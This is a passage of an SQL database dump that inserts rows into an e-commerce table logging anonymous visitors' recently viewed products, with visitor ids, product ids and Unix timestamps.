(1818, 'recently_viewed_product', 1569, NULL, 2060, 1703376000),
(1821, 'recently_viewed_product', 1572, NULL, 2060, 1703376000),
(1822, 'recently_viewed_product', 1573, NULL, 2060, 1703376000),
(1823, 'recently_viewed_product', 1574, NULL, 2053, 1703376000),
(1825, 'recently_viewed_product', 1576, NULL, 2062, 1703376000),
(1826, 'recently_viewed_product', 1577, NULL, 2053, 1703376000),
(1829, 'recently_viewed_product', 1580, NULL, 2053, 1703462400),
(1832, 'recently_viewed_product', 1583, NULL, 2060, 1703462400),
(1833, 'recently_viewed_product', 1584, NULL, 2053, 1703462400),
(1836, 'recently_viewed_product', 1587, NULL, 2053, 1703548800),
(1838, 'recently_viewed_product', 1589, NULL, 2053, 1703548800),
(1839, 'recently_viewed_product', 1590, NULL, 2059, 1703635200),
(1840, 'recently_viewed_product', 1591, NULL, 2055, 1703635200),
(1842, 'recently_viewed_product', 1593, NULL, 2055, 1703635200),
(1843, 'recently_viewed_product', 1594, NULL, 2053, 1703635200),
(1844, 'recently_viewed_product', 1595, NULL, 2053, 1703635200),
(1845, 'recently_viewed_product', 1596, NULL, 2055, 1703635200),
(1846, 'recently_viewed_product', 1597, NULL, 2061, 1703635200),
(1848, 'recently_viewed_product', 1599, NULL, 2053, 1703721600),
(1849, 'recently_viewed_product', 1600, NULL, 2053, 1703808000),
(1852, 'recently_viewed_product', 1603, NULL, 2053, 1703894400),
(1854, 'recently_viewed_product', 1605, NULL, 2062, 1703894400),
(1856, 'recently_viewed_product', 1608, NULL, 2060, 1704027425),
(1857, 'recently_viewed_product', 1610, NULL, 2053, 1703980800),
(1859, 'recently_viewed_product', 1617, NULL, 2055, 1703980800),
(1860, 'recently_viewed_product', 1618, NULL, 2059, 1704067200),
(1861, 'recently_viewed_product', 1619, NULL, 2058, 1704067200),
(1862, 'recently_viewed_product', 1620, NULL, 2055, 1704067200),
(1863, 'recently_viewed_product', 1621, NULL, 2053, 1704067200),
(1866, 'recently_viewed_product', 1625, NULL, 2053, 1704153600),
(1869, 'recently_viewed_product', 1628, NULL, 2055, 1704153600),
(1870, 'recently_viewed_product', 1629, NULL, 2055, 1704153600),
(1872, 'recently_viewed_product', 1631, NULL, 2055, 1704153600),
(1874, 'recently_viewed_product', 1633, NULL, 2053, 1704153600),
(1876, 'recently_viewed_product', 1635, NULL, 2060, 1704229524),
(1878, 'recently_viewed_product', 1637, NULL, 2055, 1704240000),
(1880, 'recently_viewed_product', 1640, NULL, 2053, 1704240000),
(1881, 'recently_viewed_product', 1641, NULL, 2055, 1704326400),
(1882, 'recently_viewed_product', 1642, NULL, 2053, 1704326400),
(1887, 'recently_viewed_product', 1647, NULL, 2053, 1704326400),
(1889, 'recently_viewed_product', 1649, NULL, 2053, 1704412800),
(1891, 'recently_viewed_product', 1651, NULL, 2060, 1704412800),
(1892, 'recently_viewed_product', 1652, NULL, 2053, 1704412800),
(1895, 'recently_viewed_product', 1655, NULL, 2061, 1704499200),
(1896, 'recently_viewed_product', 1656, NULL, 2053, 1704499200),
(1897, 'recently_viewed_product', 1661, NULL, 2060, 1704499200),
(1898, 'recently_viewed_product', 1662, NULL, 2053, 1704499200),
(1900, 'recently_viewed_product', 1664, NULL, 2061, 1704499200),
(1902, 'recently_viewed_product', 1666, NULL, 2053, 1704585600),
(1903, 'recently_viewed_product', 1667, NULL, 2059, 1704585600),
(1905, 'recently_viewed_product', 1669, NULL, 2053, 1704585600),
(1906, 'recently_viewed_product', 1670, NULL, 2059, 1704585600),
(1907, 'recently_viewed_product', 1671, NULL, 2055, 1704672000),
(1908, 'recently_viewed_product', 1672, NULL, 2055, 1704672000),
(1909, 'recently_viewed_product', 1673, NULL, 2053, 1704672000),
(1911, 'recently_viewed_product', 1675, NULL, 2053, 1704672000),
(1912, 'recently_viewed_product', 1676, NULL, 2055, 1704672000),
(1915, 'recently_viewed_product', 1679, NULL, 2053, 1704758400),
(1916, 'recently_viewed_product', 1680, NULL, 2055, 1704758400),
(1921, 'recently_viewed_product', 1685, NULL, 2055, 1704758400),
(1922, 'recently_viewed_product', 1686, NULL, 2053, 1704758400),
(1923, 'recently_viewed_product', 1687, NULL, 2062, 1704844800),
(1924, 'recently_viewed_product', 1688, NULL, 2061, 1704844800),
(1925, 'recently_viewed_product', 1689, NULL, 2061, 1704844800),
(1926, 'recently_viewed_product', 1690, NULL, 2061, 1704844800),
(1928, 'recently_viewed_product', 1692, NULL, 2053, 1704931200),
(1930, 'recently_viewed_product', 1694, NULL, 2061, 1704931200),
(1931, 'recently_viewed_product', 1695, NULL, 2059, 1704931200),
(1932, 'recently_viewed_product', 1696, NULL, 2059, 1705017600),
(1935, 'recently_viewed_product', 1699, NULL, 2059, 1705017600),
(1936, 'recently_viewed_product', 1700, NULL, 2055, 1705017600),
(1937, 'recently_viewed_product', 1701, NULL, 2053, 1705017600),
(1938, 'recently_viewed_product', 1702, NULL, 2055, 1705017600),
(1939, 'recently_viewed_product', 1703, NULL, 2055, 1705104000),
(1940, 'recently_viewed_product', 1704, NULL, 2060, 1705122190),
(1943, 'recently_viewed_product', 1712, NULL, 2059, 1705190400),
(1944, 'recently_viewed_product', 1713, NULL, 2055, 1705190400),
(1945, 'recently_viewed_product', 1714, NULL, 2059, 1705190400),
(1947, 'recently_viewed_product', 1716, NULL, 2061, 1705276800),
(1948, 'recently_viewed_product', 1717, NULL, 2055, 1705276800),
(1949, 'recently_viewed_product', 1718, NULL, 2053, 1705276800),
(1950, 'recently_viewed_product', 1719, NULL, 2055, 1705276800),
(1951, 'recently_viewed_product', 1720, NULL, 2061, 1705276800),
(1953, 'recently_viewed_product', 1722, NULL, 2059, 1705363200),
(1954, 'recently_viewed_product', 1723, NULL, 2058, 1705363200),
(1955, 'recently_viewed_product', 1724, NULL, 2061, 1705363200),
(1956, 'recently_viewed_product', 1725, NULL, 2060, 1705434799),
(1957, 'recently_viewed_product', 1726, NULL, 2062, 1705449600),
(1958, 'recently_viewed_product', 1727, NULL, 2059, 1705449600),
(1959, 'recently_viewed_product', 1728, NULL, 2059, 1705449600),
(1962, 'recently_viewed_product', 1731, NULL, 2059, 1705536000),
(1965, 'recently_viewed_product', 1734, NULL, 2059, 1705622400),
(1966, 'recently_viewed_product', 1735, NULL, 2053, 1705622400),
(1970, 'recently_viewed_product', 1739, NULL, 2059, 1705622400),
(1971, 'recently_viewed_product', 1740, NULL, 2061, 1705622400),
(1972, 'recently_viewed_product', 1741, NULL, 2053, 1705622400),
(1973, 'recently_viewed_product', 1742, NULL, 2055, 1705708800),
(1974, 'recently_viewed_product', 1743, NULL, 2060, 1705708800),
(1975, 'recently_viewed_product', 1744, NULL, 2061, 1705708800),
(1976, 'recently_viewed_product', 1745, NULL, 2055, 1705708800),
(1979, 'recently_viewed_product', 1748, NULL, 2059, 1705708800),
(1980, 'recently_viewed_product', 1749, NULL, 2059, 1705708800),
(1981, 'recently_viewed_product', 1750, NULL, 2053, 1705708800),
(1984, 'recently_viewed_product', 1753, NULL, 2053, 1705708800),
(1986, 'recently_viewed_product', 1755, NULL, 2055, 1705795200),
(1989, 'recently_viewed_product', 1758, NULL, 2053, 1705795200),
(1991, 'recently_viewed_product', 1760, NULL, 2055, 1705795200),
(1992, 'recently_viewed_product', 1761, NULL, 2053, 1705795200),
(1995, 'recently_viewed_product', 1764, NULL, 2053, 1705881600),
(1999, 'recently_viewed_product', 1767, NULL, 2059, 1705914642),
(2000, 'recently_viewed_product', 1768, NULL, 2053, 1705881600),
(2001, 'recently_viewed_product', 1769, NULL, 2059, 1705881600),
(2004, 'recently_viewed_product', 1772, NULL, 2062, 1705881600),
(2008, 'recently_viewed_product', 1776, NULL, 2053, 1705968000),
(2011, 'recently_viewed_product', 1779, NULL, 2061, 1705968000),
(2015, 'recently_viewed_product', 1783, NULL, 2061, 1706054400),
(2017, 'recently_viewed_product', 1785, NULL, 2053, 1706054400),
(2020, 'recently_viewed_product', 1788, NULL, 2053, 1706140800),
(2021, 'recently_viewed_product', 1789, NULL, 2060, 1706210292),
(2022, 'recently_viewed_product', 1791, NULL, 2053, 1706140800),
(2024, 'recently_viewed_product', 1793, NULL, 2055, 1706227200),
(2025, 'recently_viewed_product', 1792, NULL, 2061, 1706227200),
(2030, 'recently_viewed_product', 1798, NULL, 2053, 1706227200),
(2034, 'recently_viewed_product', 1802, NULL, 2061, 1706227200),
(2035, 'recently_viewed_product', 1803, NULL, 2055, 1706227200),
(2037, 'recently_viewed_product', 1805, NULL, 2053, 1706227200),
(2038, 'recently_viewed_product', 1806, NULL, 2061, 1706227200),
(2039, 'recently_viewed_product', 1807, NULL, 2061, 1706313600),
(2040, 'recently_viewed_product', 1808, NULL, 2061, 1706313600),
(2043, 'recently_viewed_product', 1812, NULL, 2059, 1706313600),
(2047, 'recently_viewed_product', 1816, NULL, 2055, 1706400000),
(2048, 'recently_viewed_product', 1817, NULL, 2059, 1706400000),
(2052, 'recently_viewed_product', 1821, NULL, 2053, 1706400000),
(2054, 'recently_viewed_product', 1823, NULL, 2055, 1706400000),
(2056, 'recently_viewed_product', 1825, NULL, 2053, 1706400000),
(2057, 'recently_viewed_product', 1826, NULL, 2059, 1706400000),
(2059, 'recently_viewed_product', 1828, NULL, 2059, 1706486400),
(2060, 'recently_viewed_product', 1829, NULL, 2059, 1706486400),
(2062, 'recently_viewed_product', 1831, NULL, 2053, 1706486400),
(2064, 'recently_viewed_product', 1833, NULL, 2061, 1706486400),
(2066, 'recently_viewed_product', 1835, NULL, 2055, 1706486400),
(2067, 'recently_viewed_product', 1836, NULL, 2059, 1706486400),
(2070, 'recently_viewed_product', 1839, NULL, 2053, 1706486400),
(2071, 'recently_viewed_product', 1840, NULL, 2061, 1706486400),
(2072, 'recently_viewed_product', 1841, NULL, 2060, 1706576696),
(2073, 'recently_viewed_product', 1842, NULL, 2059, 1706572800),
(2075, 'recently_viewed_product', 1844, NULL, 2060, 1706572800),
(2078, 'recently_viewed_product', 1847, NULL, 2055, 1706572800),
(2079, 'recently_viewed_product', 1848, NULL, 2061, 1706572800),
(2080, 'recently_viewed_product', 1849, NULL, 2061, 1706624140),
(2081, 'recently_viewed_product', 1850, NULL, 2061, 1706623039),
(2082, 'recently_viewed_product', 1851, NULL, 2060, 1706572800),
(2085, 'recently_viewed_product', 1853, NULL, 2059, 1706572800),
(2087, 'recently_viewed_product', 1855, NULL, 2055, 1706572800),
(2088, 'recently_viewed_product', 1856, NULL, 2061, 1706659200),
(2089, 'recently_viewed_product', 1857, NULL, 2060, 1706672299),
(2090, 'recently_viewed_product', 1858, NULL, 2055, 1706659200),
(2091, 'recently_viewed_product', 1859, NULL, 2059, 1706659200),
(2093, 'recently_viewed_product', 1861, NULL, 2060, 1706659200),
(2094, 'recently_viewed_product', 1862, NULL, 2055, 1706659200),
(2096, 'recently_viewed_product', 1864, NULL, 2061, 1706745600),
(2098, 'recently_viewed_product', 1866, NULL, 2053, 1706832000),
(2100, 'recently_viewed_product', 1869, NULL, 2061, 1706832000),
(2101, 'recently_viewed_product', 1870, NULL, 2061, 1706745600),
(2103, 'recently_viewed_product', 1873, NULL, 2061, 1706832000),
(2105, 'recently_viewed_product', 1875, NULL, 2061, 1706832000),
(2106, 'recently_viewed_product', 1876, NULL, 2053, 1706832000),
(2107, 'recently_viewed_product', 1877, NULL, 2062, 1706918400),
(2109, 'recently_viewed_product', 1880, NULL, 2059, 1706924109),
(2111, 'recently_viewed_product', 1882, NULL, 2053, 1706918400),
(2114, 'recently_viewed_product', 1886, NULL, 2059, 1706918400),
(2115, 'recently_viewed_product', 1887, NULL, 2053, 1706918400),
(2117, 'recently_viewed_product', 1889, NULL, 2059, 1707004800),
(2118, 'recently_viewed_product', 1890, NULL, 2061, 1707004800),
(2119, 'recently_viewed_product', 1891, NULL, 2060, 1707020371),
(2121, 'recently_viewed_product', 1893, NULL, 2053, 1707004800),
(2122, 'recently_viewed_product', 1894, NULL, 2055, 1707004800),
(2123, 'recently_viewed_product', 1895, NULL, 2055, 1707004800),
(2125, 'recently_viewed_product', 1897, NULL, 2053, 1707004800),
(2126, 'recently_viewed_product', 1898, NULL, 2059, 1707004800),
(2127, 'recently_viewed_product', 1899, NULL, 2055, 1707004800),
(2128, 'recently_viewed_product', 1900, NULL, 2058, 1707091200),
(2129, 'recently_viewed_product', 1902, NULL, 2059, 1707106884),
(2130, 'recently_viewed_product', 1903, NULL, 2059, 1707091200),
(2131, 'recently_viewed_product', 1904, NULL, 2053, 1707091200),
(2133, 'recently_viewed_product', 1905, NULL, 2055, 1707091200),
(2134, 'recently_viewed_product', 1906, NULL, 2059, 1707091200),
(2135, 'recently_viewed_product', 1907, NULL, 2055, 1707091200),
(2136, 'recently_viewed_product', 1908, NULL, 2053, 1707091200),
(2137, 'recently_viewed_product', 1909, NULL, 2059, 1707177600),
(2139, 'recently_viewed_product', 1911, NULL, 2053, 1707177600),
(2141, 'recently_viewed_product', 1913, NULL, 2053, 1707177600),
(2144, 'recently_viewed_product', 1916, NULL, 2053, 1707264000),
(2147, 'recently_viewed_product', 1919, NULL, 2053, 1707264000),
(2148, 'recently_viewed_product', 1920, NULL, 2053, 1707350400),
(2149, 'recently_viewed_product', 1921, NULL, 2059, 1707374647),
(2155, 'recently_viewed_product', 1927, NULL, 2060, 1707419615),
(2156, 'recently_viewed_product', 1928, NULL, 2053, 1707350400),
(2159, 'recently_viewed_product', 1931, NULL, 2053, 1707436800),
(2162, 'recently_viewed_product', 1934, NULL, 2053, 1707436800),
(2164, 'recently_viewed_product', 1936, NULL, 2053, 1707523200),
(2166, 'recently_viewed_product', 1938, NULL, 2060, 1707523200),
(2167, 'recently_viewed_product', 1939, NULL, 2053, 1707523200),
(2168, 'recently_viewed_product', 1940, NULL, 2060, 1707571243),
(2172, 'recently_viewed_product', 1942, NULL, 2059, 1707523200),
(2174, 'recently_viewed_product', 1944, NULL, 2059, 1707523200),
(2176, 'recently_viewed_product', 1946, NULL, 2053, 1707609600),
(2177, 'recently_viewed_product', 1947, NULL, 2059, 1707609600),
(2180, 'recently_viewed_product', 1950, NULL, 2053, 1707609600),
(2185, 'recently_viewed_product', 1955, NULL, 2059, 1707696000),
(2187, 'recently_viewed_product', 1957, NULL, 2053, 1707696000),
(2188, 'recently_viewed_product', 1958, NULL, 2053, 1707696000),
(2192, 'recently_viewed_product', 1962, NULL, 2053, 1707782400),
(2196, 'recently_viewed_product', 1966, NULL, 2060, 1707868800),
(2210, 'recently_viewed_product', 1969, NULL, 2053, 1707868800),
(2319, 'recently_viewed_product', 1968, NULL, 2058, 1707899056),
(2320, 'recently_viewed_product', 1968, NULL, 2061, 1707899073),
(2321, 'recently_viewed_product', 1968, NULL, 2059, 1707899094),
(2322, 'recently_viewed_product', 1968, NULL, 2060, 1707899121),
(2323, 'recently_viewed_product', 1968, NULL, 2062, 1707899130),
(2326, 'recently_viewed_product', 1968, NULL, 2055, 1707899199),
(2329, 'recently_viewed_product', 1971, NULL, 2053, 1707909686),
(2331, 'recently_viewed_product', 1973, NULL, 2062, 1707868800),
(2333, 'recently_viewed_product', 1975, NULL, 2053, 1707868800),
(2336, 'recently_viewed_product', 1978, NULL, 2061, 1707955200),
(2339, 'recently_viewed_product', 1981, NULL, 2053, 1707955200),
(2342, 'recently_viewed_product', 1984, NULL, 2053, 1707955200),
(2346, 'recently_viewed_product', 1988, NULL, 2053, 1708041600),
(2349, 'recently_viewed_product', 1991, NULL, 2053, 1708041600),
(2353, 'recently_viewed_product', 1996, NULL, 2053, 1708128000),
(2356, 'recently_viewed_product', 1999, NULL, 2053, 1708128000),
(2359, 'recently_viewed_product', 2002, NULL, 2059, 1708255525),
(2360, 'recently_viewed_product', 2003, NULL, 2053, 1708214400),
(2361, 'recently_viewed_product', 2004, NULL, 2055, 1708214400),
(2362, 'recently_viewed_product', 2005, NULL, 2053, 1708214400),
(2366, 'recently_viewed_product', 2009, NULL, 2053, 1708300800),
(2368, 'recently_viewed_product', 2011, NULL, 2053, 1708300800),
(2371, 'recently_viewed_product', 2014, NULL, 2053, 1708387200),
(2373, 'recently_viewed_product', 2016, NULL, 2053, 1708387200),
(2375, 'recently_viewed_product', 2018, NULL, 2053, 1708473600),
(2376, 'recently_viewed_product', 2019, NULL, 2053, 1708473600),
(2378, 'recently_viewed_product', 2021, NULL, 2053, 1708560000),
(2379, 'recently_viewed_product', 2022, NULL, 2059, 1708560000),
(2382, 'recently_viewed_product', 2025, NULL, 2053, 1708560000),
(2385, 'recently_viewed_product', 2028, NULL, 2053, 1708646400),
(2390, 'recently_viewed_product', 2032, NULL, 2053, 1708646400),
(2393, 'recently_viewed_product', 2035, NULL, 2053, 1708732800),
(2395, 'recently_viewed_product', 2037, NULL, 2061, 1708732800),
(2396, 'recently_viewed_product', 2038, NULL, 2053, 1708732800),
(2399, 'recently_viewed_product', 2042, NULL, 2061, 1708819200),
(2400, 'recently_viewed_product', 2043, NULL, 2053, 1708819200),
(2402, 'recently_viewed_product', 2045, NULL, 2053, 1708819200),
(2404, 'recently_viewed_product', 2047, NULL, 2053, 1708905600),
(2406, 'recently_viewed_product', 2049, NULL, 2060, 1708905600),
(2409, 'recently_viewed_product', 2052, NULL, 2062, 1708992000),
(2410, 'recently_viewed_product', 2053, NULL, 2058, 1708992000),
(2414, 'recently_viewed_product', 2058, NULL, 2053, 1709078400),
(2417, 'recently_viewed_product', 2061, NULL, 2053, 1709164800),
(2420, 'recently_viewed_product', 2064, NULL, 2053, 1709164800),
(2423, 'recently_viewed_product', 2067, NULL, 2053, 1709251200),
(2426, 'recently_viewed_product', 2070, NULL, 2053, 1709251200),
(2431, 'recently_viewed_product', 2075, NULL, 2053, 1709337600),
(2434, 'recently_viewed_product', 2078, NULL, 2053, 1709424000),
(2436, 'recently_viewed_product', 2080, NULL, 2055, 1709424000),
(2437, 'recently_viewed_product', 2081, NULL, 2053, 1709424000),
(2441, 'recently_viewed_product', 2085, NULL, 2053, 1709510400),
(2443, 'recently_viewed_product', 2087, NULL, 2053, 1709510400),
(2448, 'recently_viewed_product', 2092, NULL, 2059, 1709596800),
(2449, 'recently_viewed_product', 2093, NULL, 2053, 1709596800),
(2451, 'recently_viewed_product', 2095, NULL, 2053, 1709596800),
(2458, 'recently_viewed_product', 2103, NULL, 2061, 1709769600),
(2466, 'recently_viewed_product', 2111, NULL, 2053, 1709856000),
(2467, 'recently_viewed_product', 2112, NULL, 2060, 1709942400),
(2470, 'recently_viewed_product', 2115, NULL, 2053, 1709942400),
(2473, 'recently_viewed_product', 2118, NULL, 2062, 1710028800),
(2475, 'recently_viewed_product', 2120, NULL, 2053, 1710028800),
(2478, 'recently_viewed_product', 2123, NULL, 2061, 1710115200),
(2480, 'recently_viewed_product', 2125, NULL, 2053, 1710115200),
(2482, 'recently_viewed_product', 2127, NULL, 2053, 1710115200),
(2485, 'recently_viewed_product', 2130, NULL, 2061, 1710201600),
(2486, 'recently_viewed_product', 2131, NULL, 2053, 1710201600),
(2492, 'recently_viewed_product', 2138, NULL, 2053, 1710374400),
(2493, 'recently_viewed_product', 2139, NULL, 2061, 1710374400),
(2497, 'recently_viewed_product', 2143, NULL, 2061, 1710460800),
(2500, 'recently_viewed_product', 2146, NULL, 2053, 1710460800),
(2501, 'recently_viewed_product', 2147, NULL, 2061, 1710460800),
(2503, 'recently_viewed_product', 2149, NULL, 2061, 1710523014),
(2505, 'recently_viewed_product', 2151, NULL, 2061, 1710518404),
(2506, 'recently_viewed_product', 2152, NULL, 2055, 1710460800),
(2508, 'recently_viewed_product', 2154, NULL, 2053, 1710547200),
(2510, 'recently_viewed_product', 2156, NULL, 2059, 1710547200),
(2516, 'recently_viewed_product', 2162, NULL, 2059, 1710633600),
(2518, 'recently_viewed_product', 2164, NULL, 2053, 1710633600),
(2523, 'recently_viewed_product', 2169, NULL, 2058, 1710720000),
(2524, 'recently_viewed_product', 2170, NULL, 2062, 1710720000),
(2526, 'recently_viewed_product', 2172, NULL, 2059, 1710720000),
(2527, 'recently_viewed_product', 2173, NULL, 2061, 1710865436),
(2528, 'recently_viewed_product', 2174, NULL, 2059, 1710806400),
(2530, 'recently_viewed_product', 2176, NULL, 2059, 1710886446),
(2531, 'recently_viewed_product', 2177, NULL, 2060, 1710892800),
(2532, 'recently_viewed_product', 2178, NULL, 2062, 1710911076);
INSERT INTO `catalog_product_frontend_action` (`action_id`, `type_id`, `visitor_id`, `customer_id`, `product_id`, `added_at`) VALUES
(2533, 'recently_viewed_product', 2180, NULL, 2059, 1710892800),
(2535, 'recently_viewed_product', 2182, NULL, 2062, 1710935726),
(2538, 'recently_viewed_product', 2185, NULL, 2059, 1711001572),
(2539, 'recently_viewed_product', 2186, NULL, 2059, 1710979200),
(2541, 'recently_viewed_product', 2188, NULL, 2058, 1710979200),
(2542, 'recently_viewed_product', 2189, NULL, 2059, 1710979200),
(2543, 'recently_viewed_product', 2190, NULL, 2058, 1710979200),
(2547, 'recently_viewed_product', 2194, NULL, 2061, 1711065600),
(2548, 'recently_viewed_product', 2195, NULL, 2062, 1711065600),
(2550, 'recently_viewed_product', 2197, NULL, 2059, 1711188029),
(2551, 'recently_viewed_product', 2198, NULL, 2058, 1711238400),
(2554, 'recently_viewed_product', 2201, NULL, 2059, 1711238400),
(2557, 'recently_viewed_product', 2205, NULL, 2060, 1711396483),
(2559, 'recently_viewed_product', 2207, NULL, 2062, 1711411200),
(2560, 'recently_viewed_product', 2208, NULL, 2060, 1711470965),
(2563, 'recently_viewed_product', 2211, NULL, 2053, 1711497600),
(2568, 'recently_viewed_product', 2217, NULL, 2053, 1711670400),
(2569, 'recently_viewed_product', 2218, NULL, 2053, 1711670400),
(2571, 'recently_viewed_product', 2221, NULL, 2053, 1711756800),
(2572, 'recently_viewed_product', 2222, NULL, 2061, 1711756800),
(2575, 'recently_viewed_product', 2225, NULL, 2062, 1712016000),
(2576, 'recently_viewed_product', 2226, NULL, 2053, 1712016000),
(2579, 'recently_viewed_product', 2229, NULL, 2061, 1712188800),
(2581, 'recently_viewed_product', 2231, NULL, 2053, 1712275200),
(2584, 'recently_viewed_product', 2235, NULL, 2053, 1712534400),
(2594, 'recently_viewed_product', 2245, NULL, 2062, 1712966400),
(2595, 'recently_viewed_product', 2246, NULL, 2059, 1713116910),
(2596, 'recently_viewed_product', 2247, NULL, 2060, 1713139200),
(2597, 'recently_viewed_product', 2248, NULL, 2061, 1713139200),
(2600, 'recently_viewed_product', 2251, NULL, 2061, 1713225600),
(2604, 'recently_viewed_product', 2254, NULL, 2058, 1713312000),
(2605, 'recently_viewed_product', 2255, NULL, 2059, 1713398400),
(2608, 'recently_viewed_product', 2260, NULL, 2062, 1713571200),
(2629, 'recently_viewed_product', 2284, NULL, 2059, 1714003200),
(2634, 'recently_viewed_product', 2288, NULL, 2062, 1714089600),
(2636, 'recently_viewed_product', 2290, NULL, 2062, 1714176000),
(2637, 'recently_viewed_product', 2291, NULL, 2060, 1714176000),
(2640, 'recently_viewed_product', 2294, NULL, 2061, 1714262400),
(2642, 'recently_viewed_product', 2296, NULL, 2060, 1714262400),
(2646, 'recently_viewed_product', 2300, NULL, 2060, 1714483429),
(2647, 'recently_viewed_product', 2301, NULL, 2061, 1714521600),
(2648, 'recently_viewed_product', 2304, NULL, 2059, 1714905580),
(2649, 'recently_viewed_product', 2305, NULL, 2059, 1714867200),
(2650, 'recently_viewed_product', 2306, NULL, 2059, 1714867200),
(2651, 'recently_viewed_product', 2307, NULL, 2059, 1715047769),
(2653, 'recently_viewed_product', 2309, NULL, 2061, 1715226544),
(2654, 'recently_viewed_product', 2310, NULL, 2059, 1715299200),
(2655, 'recently_viewed_product', 2311, NULL, 2060, 1715299200),
(2656, 'recently_viewed_product', 2312, NULL, 2060, 1715367957),
(2657, 'recently_viewed_product', 2313, NULL, 2060, 1715299200),
(2660, 'recently_viewed_product', 2316, NULL, 2061, 1715385600),
(2661, 'recently_viewed_product', 2317, NULL, 2058, 1715385600),
(2663, 'recently_viewed_product', 2319, NULL, 2058, 1715558400),
(2664, 'recently_viewed_product', 2320, NULL, 2061, 1715644800),
(2665, 'recently_viewed_product', 2321, NULL, 2058, 1715644800),
(2667, 'recently_viewed_product', 2323, NULL, 2055, 1715731200),
(2672, 'recently_viewed_product', 2327, NULL, 2058, 1715817600),
(2673, 'recently_viewed_product', 2328, NULL, 2055, 1715817600),
(2674, 'recently_viewed_product', 2329, NULL, 2055, 1715873627),
(2680, 'recently_viewed_product', 2331, NULL, 2058, 1715873645),
(2681, 'recently_viewed_product', 2332, NULL, 2055, 1715817600),
(2682, 'recently_viewed_product', 2333, NULL, 2059, 1715817600),
(2683, 'recently_viewed_product', 2334, NULL, 2062, 1715817600),
(2684, 'recently_viewed_product', 2335, NULL, 2062, 1715904000),
(2687, 'recently_viewed_product', 2338, NULL, 2061, 1715990400),
(2688, 'recently_viewed_product', 2339, NULL, 2059, 1715990400),
(2689, 'recently_viewed_product', 2340, NULL, 2059, 1715990400),
(2690, 'recently_viewed_product', 2341, NULL, 2059, 1716060791),
(2693, 'recently_viewed_product', 2343, NULL, 2061, 1716060933),
(2694, 'recently_viewed_product', 2342, NULL, 2062, 1716060885),
(2702, 'recently_viewed_product', 2352, NULL, 2059, 1716768000),
(2703, 'recently_viewed_product', 2353, NULL, 2062, 1716854400),
(2704, 'recently_viewed_product', 2354, NULL, 2055, 1716854400),
(2709, 'recently_viewed_product', 2359, NULL, 2059, 1717027200),
(2716, 'recently_viewed_product', 2363, NULL, 2061, 1719240918),
(2717, 'recently_viewed_product', 2364, NULL, 2062, 1719682996),
(2718, 'recently_viewed_product', 2366, NULL, 2058, 1720179435),
(2724, 'recently_viewed_product', 2373, NULL, 2059, 1720742400),
(2726, 'recently_viewed_product', 2375, NULL, 2062, 1720891880),
(2731, 'recently_viewed_product', 2381, NULL, 2060, 1721174400),
(2736, 'recently_viewed_product', 2386, NULL, 2059, 1721692800),
(2737, 'recently_viewed_product', 2387, NULL, 2058, 1721779200),
(2741, 'recently_viewed_product', 2391, NULL, 2062, 1721779200),
(2742, 'recently_viewed_product', 2392, NULL, 2062, 1721866223),
(2744, 'recently_viewed_product', 2394, NULL, 2055, 1721865600),
(2760, 'recently_viewed_product', 2410, NULL, 2059, 1722556800),
(2761, 'recently_viewed_product', 2411, NULL, 2059, 1722556800),
(2763, 'recently_viewed_product', 2413, NULL, 2059, 1722609878),
(2764, 'recently_viewed_product', 2414, NULL, 2059, 1722707157),
(2765, 'recently_viewed_product', 2415, NULL, 2058, 1722729600),
(2766, 'recently_viewed_product', 2416, NULL, 2062, 1722816000),
(2773, 'recently_viewed_product', 2423, NULL, 2058, 1722988800),
(2774, 'recently_viewed_product', 2424, NULL, 2055, 1723075200),
(2776, 'recently_viewed_product', 2426, NULL, 2060, 1723161600),
(2779, 'recently_viewed_product', 2429, NULL, 2058, 1723237776),
(2780, 'recently_viewed_product', 2430, NULL, 2062, 1723161600),
(2781, 'recently_viewed_product', 2431, NULL, 2058, 1723248000),
(2782, 'recently_viewed_product', 2432, NULL, 2058, 1723248000),
(2787, 'recently_viewed_product', 2437, NULL, 2059, 1723334400),
(2788, 'recently_viewed_product', 2438, NULL, 2059, 1723334400),
(2793, 'recently_viewed_product', 2444, NULL, 2059, 1723593600),
(2794, 'recently_viewed_product', 2445, NULL, 2058, 1723767955),
(2795, 'recently_viewed_product', 2446, NULL, 2062, 1723782204),
(2798, 'recently_viewed_product', 2449, NULL, 2055, 1723868909),
(2799, 'recently_viewed_product', 2450, NULL, 2062, 1723852800),
(2801, 'recently_viewed_product', 2452, NULL, 2062, 1723973836),
(2802, 'recently_viewed_product', 2453, NULL, 2055, 1724025600),
(2804, 'recently_viewed_product', 2455, NULL, 2058, 1724064867),
(2806, 'recently_viewed_product', 2457, NULL, 2061, 1724112000),
(2812, 'recently_viewed_product', 2463, NULL, 2060, 1724112000),
(2814, 'recently_viewed_product', 2465, NULL, 2058, 1724213222),
(2818, 'recently_viewed_product', 2469, NULL, 2059, 1724284800),
(2819, 'recently_viewed_product', 2470, NULL, 2058, 1724284800),
(2825, 'recently_viewed_product', 2476, NULL, 2059, 1724371200),
(2828, 'recently_viewed_product', 2479, NULL, 2058, 1724457600),
(2830, 'recently_viewed_product', 2481, NULL, 2059, 1724457600),
(2831, 'recently_viewed_product', 2482, NULL, 2055, 1724457600),
(2833, 'recently_viewed_product', 2484, NULL, 2062, 1724526209),
(2836, 'recently_viewed_product', 2487, NULL, 2059, 1724605862),
(2837, 'recently_viewed_product', 2488, NULL, 2058, 1724544000),
(2839, 'recently_viewed_product', 2490, NULL, 2059, 1724544000),
(2847, 'recently_viewed_product', 2496, NULL, 2058, 1724734609),
(2850, 'recently_viewed_product', 2499, NULL, 2055, 1724803200),
(2856, 'recently_viewed_product', 2505, NULL, 2062, 1724889600),
(2864, 'recently_viewed_product', 2514, NULL, 2059, 1725062400),
(2865, 'recently_viewed_product', 2515, NULL, 2059, 1725148800),
(2867, 'recently_viewed_product', 2517, NULL, 2058, 1725165834),
(2871, 'recently_viewed_product', 2521, NULL, 2060, 1725148800),
(2874, 'recently_viewed_product', 2524, NULL, 2060, 1725235200),
(2877, 'recently_viewed_product', 2527, NULL, 2060, 1725235200),
(2880, 'recently_viewed_product', 2530, NULL, 2058, 1725235200),
(2886, 'recently_viewed_product', 2536, NULL, 2055, 1725494400),
(2894, 'recently_viewed_product', 2544, NULL, 2060, 1725667200),
(2899, 'recently_viewed_product', 2549, NULL, 2061, 1725840000),
(2903, 'recently_viewed_product', 2553, NULL, 2062, 1725926400),
(2912, 'recently_viewed_product', 2562, NULL, 2059, 1726185600),
(2915, 'recently_viewed_product', 2565, NULL, 2060, 1726185600),
(2924, 'recently_viewed_product', 2572, NULL, 2059, 1726444800),
